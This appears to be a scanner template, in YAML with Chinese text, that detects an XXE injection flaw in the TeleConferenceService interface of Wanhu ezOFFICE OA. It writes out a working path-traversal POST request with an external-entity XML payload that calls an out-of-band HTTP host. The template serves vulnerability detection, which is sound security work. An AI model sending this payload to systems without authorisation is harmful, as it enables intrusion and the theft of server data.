漏洞描述
万户OA TeleConferenceService接口存在XXE注入漏洞,攻击者通过漏洞可以继续XXE注入获取服务器敏感信息
app="万户网络-ezOFFICE"
id: wanhu-oa-tele-conference-service-xxe
info:
name: 万户OA TeleConferenceService XXE注入漏洞
author: zan8in
severity: critical
verified: true
description: |
万户OA TeleConferenceService接口存在XXE注入漏洞,攻击者通过漏洞可以继续XXE注入获取服务器敏感信息
app="万户网络-ezOFFICE"
tags: wanhu,oa,xxe
created: 2024/02/26
set:
oob: oob()
oobHTTP: oob.HTTP
rules:
r0:
request:
method: POST
path: /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleConferenceService
body: |
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "{{oobHTTP}}" >]>
<value>&xxe;</value>
expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()